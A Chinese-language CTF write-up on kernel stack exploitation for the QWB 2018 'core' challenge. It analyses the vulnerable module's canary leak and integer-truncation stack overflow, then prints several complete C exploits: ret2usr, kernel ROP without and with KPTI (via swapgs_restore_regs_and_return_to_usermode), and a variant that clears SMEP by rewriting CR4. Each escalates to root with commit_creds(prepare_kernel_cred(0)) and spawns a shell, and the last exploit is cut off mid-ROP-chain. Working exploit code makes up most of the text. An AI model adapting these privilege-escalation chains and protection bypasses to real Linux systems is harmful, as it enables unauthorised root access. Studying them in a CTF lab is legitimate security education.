前言 由于typora 编辑起来太卡了, 所以将基础部分已经迁移至《深入理解Pwn_Kernel基础篇》
内核栈利用 QWB_2018_core 题目分析 start.sh
1 2 3 4 5 6 7 8 qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -s \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \
开启了 kaslr保护。
如果自己编译的 qemu 可能会报错network backend ‘user‘ is not compiled into this binary,解决方法就是sudo apt-get install libslirp-dev,然后重新编译 ./configure --enable-slirp。
init
解压 core.cpio ,分析 init 文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: init ───────┼───────────────────────────────────────────────────────────────────────────────── 1 │ 2 │ mount -t proc proc /proc 3 │ mount -t sysfs sysfs /sys 4 │ mount -t devtmpfs none /dev 5 │ /sbin/mdev -s 6 │ mkdir -p /dev/pts 7 │ mount -vt devpts -o gid=4,mode=620 none /dev/pts 8 │ chmod 666 /dev/ptmx 9 │ cat /proc/kallsyms > /tmp/kallsyms 10 │ echo 1 > /proc/sys/kernel/kptr_restrict 11 │ echo 1 > /proc/sys/kernel/dmesg_restrict 12 │ ifconfig eth0 up 13 │ udhcpc -i eth0 14 │ ifconfig eth0 10.0.2.15 netmask 255.255.255.0 15 │ route add default gw 10.0.2.2 16 │ insmod /core.ko 17 │ 18 │ poweroff -d 120 -f & 19 │ setsid /bin/cttyhack setuidgid 1000 /bin/sh 20 │ echo 'sh end!\n' 21 │ umount /proc 22 │ umount /sys 23 │ 24 │ poweroff -d 0 -f ───────┴────────────────────────────
第 9 行中把 kallsyms 的内容保存到了 /tmp/kallsyms 中,那么我们就能从 /tmp/kallsyms 中读取 commit_creds,prepare_kernel_cred 的函数的地址了
第 10 行把 kptr_restrict 设为 1,这样就不能通过 /proc/kallsyms 查看函数地址了,但第 9 行已经把其中的信息保存到了一个可读的文件中,这句就无关紧要了
第 11 行把 dmesg_restrict 设为 1,这样就不能通过 dmesg 查看 kernel 的信息了
第 18 行设置了定时关机,为了避免做题时产生干扰,直接把这句删掉然后重新打包
里面还有一个 gen_cpio.sh 脚本,用于快速打包。
1 2 3 4 5 6 7 ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: gen_cpio.sh ───────┼───────────────────────────────────────────────────────────────────────────────── 1 │ find . -print0 \ 2 │ | cpio --null -ov --format=newc \ 3 │ | gzip -9 > $1 ───────┴─────────────────────────────────────────────────────────────────────────────────
core.ko
检查一下保护。
1 2 3 4 5 6 7 ❯ checksec core/core.ko [*] '/home/pwn/kernel/pwn/give_to_player/core/core.ko' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x0)
使用 IDA 继续分析.ko文件。
init_module() 注册了 /proc/core
1 2 3 4 5 6 __int64 init_module () { core_proc = proc_create("core" , 438LL , 0LL , &core_fops); printk(&unk_2DE); return 0LL ; }
exit_core()删除 /proc/core。
1 2 3 4 5 6 7 8 __int64 exit_core () { __int64 result; if ( core_proc ) result = remove_proc_entry("core" ); return result; }
core_ioctl() 定义了三条命令,分别调用 core_read(), core_copy_func()和设置全局变量 off。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 __int64 __fastcall core_ioctl (__int64 a1, int a2, __int64 a3) { switch ( a2 ) { case 0x6677889B : core_read(a3); break ; case 0x6677889C : printk(&unk_2CD); off = a3; break ; case 0x6677889A : printk(&unk_2B3); core_copy_func(a3); break ; } return 0LL ; }
core_read() 从 v4[off] 拷贝 64 个字节到用户空间,但要注意的是全局变量 off 是我们能够控制的,因此可以合理的控制 off 来 leak canary 和一些地址 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 void __fastcall core_read (__int64 a1) { __int64 v1; char *v2; signed __int64 i; char v4[64 ]; unsigned __int64 v5; v1 = a1; v5 = __readgsqword(0x28 u); printk("\x016core: called core_read\n" ); printk("\x016%d %p\n" ); v2 = v4; for ( i = 16LL ; i; --i ) { *(_DWORD *)v2 = 0 ; v2 += 4 ; } strcpy (v4, "Welcome to the QWB CTF challenge.\n" ); if ( copy_to_user(v1, &v4[off], 64LL ) ) __asm { swapgs } }
core_copy_func() 从全局变量 name 中拷贝数据到局部变量中,长度是由我们指定的,当要注意的是 qmemcpy 用的是 unsigned __int16,但传递的长度是 signed __int64,因此如果控制传入的长度为 0xffffffffffff0000|(0x100) 等值,就可以栈溢出了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 __int64 __fastcall core_copy_func (__int64 a1) { __int64 result; _QWORD v2[10 ]; v2[8 ] = __readgsqword(0x28 u); printk(&unk_215); if ( a1 > 63 ) { printk(&unk_2A1); return 0xFFFFFFFF LL; } else { result = 0LL ; qmemcpy(v2, &name, (unsigned __int16)a1); } return result; }
core_write() 向全局变量 name 上写,这样通过 core_write() 和 core_copy_func() 就可以控制 ropchain 了 。
1 2 3 4 5 6 7 8 9 10 11 signed __int64 __fastcall core_write (__int64 a1, __int64 a2, unsigned __int64 a3) { unsigned __int64 v3; v3 = a3; printk("\x016core: called core_writen" ); if ( v3 <= 0x800 && !copy_from_user(name, a2, v3) ) return (unsigned int )v3; printk("\x016core: error copying data from userspacen" ); return 0xFFFFFFF2 LL; }
动态调试 关闭 kaslr 并将权限调到 root,通过 add-symbol-file core.ko textaddr 把 core.ko 符号加载进去。
1 2 3 4 5 6 7 8 #!/bin/sh gdb -q \ -ex "file $(find . -name vmlinux) " \ -ex "add-symbol-file $(find . -name core.ko) 0xffffffffc0000000" \ -ex "target remote localhost:1234" \ -ex "b *0xffffffffc000015f" \ -ex "c"
exp 都很简单,很容易看懂,就不调试了。
ret2user 内核态的 ROP 与用户态的 ROP 一般无二,只不过利用的 gadget 变成了内核中的 gadget,所需要构造执行的 ropchain 由system("/bin/sh") 变为了 commit_creds(&init_cred) 或 commit_creds(prepare_kernel_cred(NULL)),当我们成功地在内核中执行这样的代码后,当前线程的 cred 结构体便变为 init 进程的 cred 的拷贝,我们也就获得了 root 权限,此时在用户态起一个 shell 便能获得 root shell。
状态保存
通常情况下,我们的 exploit 需要进入到内核当中完成提权,而我们最终仍然需要着陆回用户态以获得一个 root 权限的 shell,因此在我们的 exploit 进入内核态之前我们需要手动模拟用户态进入内核态的准备工作—— 保存各寄存器的值到内核栈上,以便于后续着陆回用户态。通常情况下使用如下函数保存各寄存器值到我们自己定义的变量中,以便于构造 rop 链:
算是一个通用的 pwn 板子。
方便起见,使用了内联汇编,编译时需要指定参数:-masm=intel。
1 2 3 4 5 6 7 8 9 10 11 size_t user_cs, user_ss, user_rflags, user_sp;void saveStatus () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("\033[34m\033[1m[*] Status has been saved.\033[0m" ); }
返回用户态
由内核态返回用户态只需要:
swapgs指令通过用一个MSR中的值交换GS寄存器的内容,用来获取指向内核数据结构的指针,然后才能执行系统调用之类的内核空间程序。也用于恢复用户态 GS 寄存器。
sysretq或者iretq恢复到用户空间
那么我们只需要在内核中找到相应的 gadget 并执行swapgs;iretq就可以成功着陆回用户态。
执行 iretq 时的栈布局。
1 2 3 4 5 6 7 8 9 10 11 |----------------------| | RIP |<== low mem |----------------------| | CS | |----------------------| | EFLAGS | |----------------------| | RSP | |----------------------| | SS |<== high mem |----------------------|
所以我们应当构造如下 rop 链以返回用户态并获得一个 shell:
1 2 3 4 5 6 7 ↓ swapgs iretq user_shell_addr user_cs user_eflags user_sp user_ss
利用思路 在未开启 SMAP/SMEP 保护的情况下,用户空间无法访问内核空间的数据,但是内核空间可以访问 / 执行用户空间的数据,因此 ret2usr 这种攻击手法应运而生,以内核的 ring 0 权限执行用户空间的代码以完成提权。ret2user 即返回到用户空间的提权代码上进行提权,之后返回用户态即为 root 权限。通常 CTF 中的 ret2usr 还是以执行commit_creds(prepare_kernel_cred(NULL))进行提权为主要的攻击手法,不过相比起构造冗长的 ROP chain,ret2usr 只需我们要提前在用户态程序构造好对应的函数指针、获取相应函数地址后直接 ret 回到用户空间执行即可。另外题目给的vmlinux用于提取gadget可以,但使用IDA分析时太慢,可以用vmlinux-to-elf解压bzImage进行分析。
从 /tmp/kallsyms 读取符号地址,确认与nokaslr偏移,从vmlinux寻找gadget。
保存用户状态。
通过设置 off 读取 canary。
于内核态访问用户空间的 commit_creds(prepare_kernel_cred(NULL))提权。
通过 swapgs; mov trap_frame, rsp; iretq 返回用户空间,并执行 system("/bin/sh");。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> #define KERNCALL __attribute__((regparm(3))) void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0 ;void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0 ;void *init_cred = (void *) 0xFFFFFFFF8223D1A0 ;void get_shell () { system("/bin/sh" ); }struct trap_frame { size_t user_rip; size_t user_cs; size_t user_rflags; size_t user_sp; size_t user_ss; } __attribute__((packed)); struct trap_frame tf ;size_t user_cs, user_rflags, user_sp, user_ss, tf_addr = (size_t ) &tf;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); tf.user_rip = (size_t ) get_shell; tf.user_cs = user_cs; tf.user_rflags = user_rflags; tf.user_sp = user_sp - 0x1000 ; tf.user_ss = user_ss; puts ("[*] status has been saved." ); } void get_root () { commit_creds(init_cred); asm ("swapgs;" "mov rsp, tf_addr;" "iretq;" ); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds = (void *) ((size_t ) commit_creds + offset); prepare_kernel_cred = (void *) ((size_t ) prepare_kernel_cred + offset); init_cred = (void *) ((size_t ) init_cred + offset); break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { rebase(); save_status(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; *(void **) &buf[80 ] = get_root; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
kernel rop without KPIT 开启 smep 和 smap 保护后,内核空间无法执行用户空间的代码,并且无法访问用户空间的数据。因此不能直接 ret2user 。利用 ROP ,执行 commit_creds(prepare_kernel_cred(0)) , 然后 iret 返回用户空间可以绕过上述保护。
添加 smep 和 smap 保护。
1 2 3 4 5 6 7 8 9 qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \ -s \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \ -cpu qemu64,+smep,+smap
由于找不到 mov rdi, rax; ret; 这条 gadget ,因此需要用 mov rdi, rax; call rdx; 代替,其中 rdx 指向 pop rcx; ret; 可以清除 call 指令压入栈中的 rip ,因此相当于 ret 。
利用思路
从 /tmp/kallsyms 读取符号地址,确认与nokaslr偏移,从vmlinux寻找gadget。
保存用户状态。
通过设置 off 读取 canary。
于内核空间 rop 调用 commit_creds(prepare_kernel_cred(NULL))提权。
通过 swapgs; popfq; ret; ,iretq 返回用户空间,并执行 system("/bin/sh");。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t pop_rdx_ret = 0xffffffff810a0f49 ;size_t pop_rcx_ret = 0xffffffff81021e53 ;size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a ;size_t swapgs_popfq_ret = 0xffffffff81a012da ;size_t iretq = 0xffffffff81050ac2 ;void get_shell () { system("/bin/sh" ); } size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; pop_rdx_ret += offset; pop_rcx_ret += offset; mov_rdi_rax_call_rdx += offset; swapgs_popfq_ret += offset; iretq += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { save_status(); rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; size_t *rop = (size_t *) &buf[80 ], it = 0 ; rop[it++] = pop_rdi_ret; rop[it++] = 0 ; rop[it++] = prepare_kernel_cred; rop[it++] = pop_rdx_ret; rop[it++] = pop_rcx_ret; rop[it++] = mov_rdi_rax_call_rdx; rop[it++] = commit_creds; rop[it++] = swapgs_popfq_ret; rop[it++] = 0 ; rop[it++] = iretq; rop[it++] = (size_t ) get_shell; rop[it++] = user_cs; rop[it++] = user_rflags; rop[it++] = user_sp; rop[it++] = user_ss; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
kernel rop with KPIT 开启 kpti
1 2 3 4 5 6 7 8 9 10 #!/bin/sh qemu-system-x86_64 \ -m 256M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \ -s \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \ -cpu kvm64,+smep,+smap
利用思路 此时需要借助 swapgs_restore_regs_and_return_to_usermode 返回用户态。该函数是内核在 arch/x86/entry/entry_64.S 中提供的一个用于完成内核态到用户态切换的函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 .text:FFFFFFFF81A008DA ; __int64 swapgs_restore_regs_and_return_to_usermode(void) .text:FFFFFFFF81A008DA public swapgs_restore_regs_and_return_to_usermode .text:FFFFFFFF81A008DA swapgs_restore_regs_and_return_to_usermode proc near .text:FFFFFFFF81A008DA ; CODE XREF: ;entry_SYSCALL_64_after_hwframe+4D↑j .text:FFFFFFFF81A008DA ; entry_SYSCALL_64_after_hwframe+5E↑j ... .text:FFFFFFFF81A008DA pop r15 .text:FFFFFFFF81A008DC pop r14 .text:FFFFFFFF81A008DE pop r13 .text:FFFFFFFF81A008E0 pop r12 .text:FFFFFFFF81A008E2 pop rbp .text:FFFFFFFF81A008E3 pop rbx .text:FFFFFFFF81A008E4 pop r11 .text:FFFFFFFF81A008E6 pop r10 .text:FFFFFFFF81A008E8 pop r9 .text:FFFFFFFF81A008EA pop r8 .text:FFFFFFFF81A008EC pop rax .text:FFFFFFFF81A008ED pop rcx .text:FFFFFFFF81A008EE pop rdx .text:FFFFFFFF81A008EF pop rsi .text:FFFFFFFF81A008F0 mov rdi, rsp ; jump this .text:FFFFFFFF81A008F3 mov rsp, gs:qword_5004 .text:FFFFFFFF81A008FC push qword ptr [rdi+30h] .text:FFFFFFFF81A008FF push qword ptr [rdi+28h] .text:FFFFFFFF81A00902 push qword ptr [rdi+20h] .text:FFFFFFFF81A00905 push qword ptr [rdi+18h] .text:FFFFFFFF81A00908 push qword ptr [rdi+10h] .text:FFFFFFFF81A0090B push qword ptr [rdi] .text:FFFFFFFF81A0090D push rax .text:FFFFFFFF81A0090E jmp short loc_FFFFFFFF81A00953 [......] ;loc_FFFFFFFF81A00953 .text:FFFFFFFF81A00953 loc_FFFFFFFF81A00953: ; CODE XREF: ;swapgs_restore_regs_and_return_to_usermode+34↑j .text:FFFFFFFF81A00953 pop rax .text:FFFFFFFF81A00954 pop rdi .text:FFFFFFFF81A00955 swapgs .text:FFFFFFFF81A00958 jmp native_iret .text:FFFFFFFF81A00958 swapgs_restore_regs_and_return_to_usermode endp [......] ;native_iret .text:FFFFFFFF81A00980 test [rsp+arg_18], 4 .text:FFFFFFFF81A00985 jnz short native_irq_return_ldt .text:FFFFFFFF81A00985 native_iret endp [......] ;native_irq_return_ldt .text:FFFFFFFF81A00989 push rdi .text:FFFFFFFF81A0098A swapgs .text:FFFFFFFF81A0098D jmp short loc_FFFFFFFF81A009A1 [......] ;loc_FFFFFFFF81A009A1 .text:FFFFFFFF81A009A1 mov rdi, gs:qword_F000 .text:FFFFFFFF81A009AA mov [rdi], rax .text:FFFFFFFF81A009AD mov rax, [rsp+8] .text:FFFFFFFF81A009B2 mov [rdi+8], rax .text:FFFFFFFF81A009B6 mov rax, [rsp+8+arg_0] .text:FFFFFFFF81A009BB mov [rdi+10h], rax .text:FFFFFFFF81A009BF mov rax, [rsp+8+arg_8] .text:FFFFFFFF81A009C4 mov [rdi+18h], rax .text:FFFFFFFF81A009C8 mov rax, [rsp+8+arg_18] .text:FFFFFFFF81A009CD mov [rdi+28h], rax .text:FFFFFFFF81A009D1 mov rax, [rsp+8+arg_10] .text:FFFFFFFF81A009D6 mov [rdi+20h], rax .text:FFFFFFFF81A009DA and eax, 0FFFF0000h .text:FFFFFFFF81A009DF or rax, gs:qword_F008 .text:FFFFFFFF81A009E8 push rax .text:FFFFFFFF81A009E9 jmp short loc_FFFFFFFF81A00A2E [......] ;loc_FFFFFFFF81A00A2E .text:FFFFFFFF81A00A2E pop rax .text:FFFFFFFF81A00A2F swapgs .text:FFFFFFFF81A00A32 pop rdi .text:FFFFFFFF81A00A33 mov rsp, rax .text:FFFFFFFF81A00A36 pop rax .text:FFFFFFFF81A00A37 jmp native_irq_return_iret [......] ;native_irq_return_iret .text:FFFFFFFF81A00987 iretq .text:FFFFFFFF81A00987 native_irq_return_iret endp
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0 ;size_t commit_creds = 0xFFFFFFFF8109C8E0 ;size_t init_cred = 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t pop_rdx_ret = 0xffffffff810a0f49 ;size_t pop_rcx_ret = 0xffffffff81021e53 ;size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a ;size_t swapgs_popfq_ret = 0xffffffff81a012da ;size_t iretq = 0xffffffff81050ac2 ;size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA ;void get_shell () { system("/bin/sh" ); } size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds += offset; prepare_kernel_cred += offset; init_cred += offset; pop_rdi_ret += offset; pop_rdx_ret += offset; pop_rcx_ret += offset; mov_rdi_rax_call_rdx += offset; swapgs_popfq_ret += offset; iretq += offset; swapgs_restore_regs_and_return_to_usermode += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { save_status(); rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; size_t *rop = (size_t *) &buf[80 ], it = 0 ; rop[it++] = pop_rdi_ret; rop[it++] = 0 ; rop[it++] = prepare_kernel_cred; rop[it++] = pop_rdx_ret; rop[it++] = pop_rcx_ret; rop[it++] = mov_rdi_rax_call_rdx; rop[it++] = commit_creds; rop[it++] = swapgs_restore_regs_and_return_to_usermode + 0x16 ; rop[it++] = 0 ; rop[it++] = 0 ; rop[it++] = (size_t ) get_shell; rop[it++] = user_cs; rop[it++] = user_rflags; rop[it++] = user_sp; rop[it++] = user_ss; core_write(buf, sizeof (buf)); core_copy_func(0xffffffffffff0000 | sizeof (buf)); return 0 ; }
kernel rop + ret2user 利用思路 这种方法实际上是将前两种方法结合起来,同样可以绕过 smap 和 smep 保护。大体思路是先利用 rop 设置 cr4 为 0x6f0 (这个值可以通过用 cr4 原始值 & 0xFFFFF 得到)关闭 smep , 然后 iret 到用户空间去执行提权代码。
例如,当
1 $CR4 = 0x1407f0 = 000 1 0100 0000 0111 1111 0000
时,smep 保护开启。而 CR4 寄存器是可以通过 mov 指令修改的,因此只需要
1 2 mov cr4, 0x1407e0 # 0x1407e0 = 101 0 0000 0011 1111 00000
即可关闭 smep 保护。
搜索一下从 vmlinux 中提取出的 gadget,很容易就能达到这个目的。
如何查看 CR4 寄存器的值?
gdb 无法查看 cr4 寄存器的值,可以通过 kernel crash 时的信息查看。为了关闭 smep 保护,常用一个固定值 0x6f0,即 mov cr4, 0x6f0。
exp 注意这里 smap 保护不能直接关闭,因此不能像前面 ret2usr 那样直接在 exp 中写入 trap frame 然后栈迁移到 trap frame 的地址,而是在 rop 中构造 trap frame 结构。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/ioctl.h> #define KERNCALL __attribute__((regparm(3))) void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0 ;void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0 ;void *init_cred = (void *) 0xFFFFFFFF8223D1A0 ;size_t pop_rdi_ret = 0xffffffff81000b2f ;size_t pop_rdx_ret = 0xffffffff810a0f49 ;size_t pop_rcx_ret = 0xffffffff81021e53 ;size_t mov_cr4_rdi_ret = 0xffffffff81075014 ;size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a ;size_t swapgs_popfq_ret = 0xffffffff81a012da ;size_t iretq = 0xffffffff81050ac2 ;void get_shell () { system("/bin/sh" ); }size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } void get_root () { commit_creds(prepare_kernel_cred(0 )); } int core_fd;void core_read (char *buf) { ioctl(core_fd, 0x6677889B , buf); } void set_off (size_t off) { ioctl(core_fd, 0x6677889C , off); } void core_copy_func (size_t len) { ioctl(core_fd, 0x6677889A , len); } void core_write (char *buf, size_t len) { write(core_fd, buf, len); } void rebase () { FILE *kallsyms_fd = fopen("/tmp/kallsyms" , "r" ); if (kallsyms_fd < 0 ) { puts ("[-] Failed to open kallsyms.\n" ); exit (-1 ); } char name[0x50 ], type[0x10 ]; size_t addr; while (fscanf (kallsyms_fd, "%llx%s%s" , &addr, type, name)) { size_t offset = -1 ; if (!strcmp (name, "commit_creds" )) { offset = addr - (size_t ) commit_creds; } else if (!strcmp (name, "prepare_kernel_cred" )) { offset = addr - (size_t ) prepare_kernel_cred; } if (offset != -1 ) { printf ("[*] offset: %p\n" , offset); commit_creds = (void *) ((size_t ) commit_creds + offset); prepare_kernel_cred = (void *) ((size_t ) prepare_kernel_cred + offset); init_cred = (void *) ((size_t ) init_cred + offset); pop_rdi_ret += offset; pop_rdx_ret += offset; pop_rcx_ret += offset; mov_rdi_rax_call_rdx += offset; swapgs_popfq_ret += offset; iretq += offset; break ; } } printf ("[*] commit_creds: %p\n" , (size_t ) commit_creds); printf ("[*] prepare_kernel_cred: %p\n" , (size_t ) prepare_kernel_cred); } size_t get_canary () { set_off(64 ); char buf[64 ]; core_read(buf); return *(size_t *) buf; } int main () { save_status(); rebase(); core_fd = open("/proc/core" , O_RDWR); if (core_fd < 0 ) { puts ("[-] Failed to open core." ); exit (-1 ); } size_t canary = get_canary(); printf ("[*] canary: %p\n" , canary); char buf[0x100 ]; memset (buf, 'a' , sizeof (buf)); *(size_t *) &buf[64 ] = canary; size_t *rop = (size_t *) &buf[80 ], it = 0 ; rop[it++] = pop_rdi_ret; rop[it++] = 0x00000000000006f0 ; rop[it++] = 